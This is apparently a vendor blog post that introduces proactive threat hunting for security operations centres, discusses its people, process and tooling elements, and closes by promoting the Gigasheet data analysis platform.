As threat actors continue to escalate their cyber-attacks, both in technique complexity, creativity, and execution, victim organizations are fighting back harder than ever, as attested by the latest global dwell time reported in Mandiant's 2021 M-Trends Report. In 2020, the global dwell time, or the number of days a threat actor remains within a victim environment before being detected, was only twenty-four (24) days, almost two thousand percent (2000%) less than ten years ago (dwell time in 2011 was 416 days). While these numbers are encouraging to the ongoing cyber-fight and a testament to organizations' commitment to information security, more sophisticated attacks that rely on commonly approved tools may bypass automated detective controls and remain hidden for long periods in the noise of the network. Consequently, some organizations are maturing their security operations and incident response capabilities by adopting proactive threat hunting to help uncover threats that may otherwise bypass automated detective and preventive technical controls or remain unseen by the naked eye.
This blog will introduce threat hunting as the next step in SOC and incident response maturity, focusing on the people, processes, and technology elements that underpin this advanced capability.
Threat hunting is the practice of proactively analyzing system and network events against hypotheses using curated threat intelligence to help uncover active threats hidden within an environment. Although threat hunting is a desirable internal capability for well-resourced and mature information security programs, it may be the wrong investment for under-staffed organizations or information security teams with deficient security operations and incident response programs. The idiom "walk before you run" remains true: you should master threat detection (e.g., alerting, triaging, and response) before graduating to threat hunting.
Threat hunting augments threat detection and response by adding an analytical process that begins with a threat hypothesis proven or otherwise disproven by research and data. The outcome can be twofold when proving a hypothesis:
In either case, threat hunting is a proactive approach requiring humans to look beyond automated, rule-based conclusive signals for intrusion indicators before a security tool generates an alert.
Unlike threat detection, which relies heavily on technology and process, threat hunting is knowledge, skills, and competency-driven; technology and process are auxiliary. A successful threat hunter will have advanced knowledge of threats, attack methods, tactics, incident response, security monitoring, and systems. Furthermore, threat hunters will possess a deep understanding of the environment in which threat hunting is conducted and an inquisitive, intellectually curious, and creative mind focused on defeating threat actors on the other side.
The "people" element is the pillar of threat hunting, while processes and tools assume a secondary role.
The purpose of threat hunting is to look for evidence of active threats hidden in an IT environment. Although several threat hunting methodologies have become available in recent years, there aren't one-size-fits-all rules or step-by-step guides that one can follow to prove or disprove a threat scenario or hypothesis. And attempting to create a process or place a rigid structure around threat hunting will keep hunters from thinking outside the box, expanding their hunting scope, pivoting to other hypotheses, and ultimately outsmarting the attackers. In general, a common threat hunting process may include the following steps:
Threat hunters should be given a blank canvas to start from and a high-level framework to get inspiration from and keep from getting lost, such as the MITRE ATT&CK framework or the Cyber Kill Chain.
Threat hunting would not be needed if technology or tools were enough to detect security threats. While some aspects of threat hunting can be automated, such as data collection, it is impossible to fully automate threat hunting as it requires human analysis, creative thinking, and intuition. Several tools can aid in threat hunting, including endpoint and network detection and response tools, threat intelligence platforms, and Security Information and Events Management systems (SIEM), but these are secondary to human analysis.
Additionally, threat hunters should consider adding a data analysis platform to their tool arsenal to help annotate, group, aggregate, transform, and share different data sets with other threat hunters to identify patterns and indicators of attacks. Tools like Gigasheet, designed with an intuitive user interface, allow threat hunters to start analyzing data quickly without the steep learning curve other tools or programming languages require. Doing so enables threat hunters to focus on what they are good at (hunting threats) rather than writing scripts and programs to aggregate, collate, and analyze data.
Suppose your organization has mastered the art of threat detection and response, is no longer yielding high-value detections from automated, rule-based alerting tools but is concerned about advanced and stealthy threats. In that case, you can step up your SOC and incident response game by developing and implementing a threat hunting capability designed to proactively look for signs of intrusions and hidden threats that may otherwise be missed. And if you need a data analysis platform to help your team along the way, try Gigasheet (it's free), the next-generation threat hunting platform.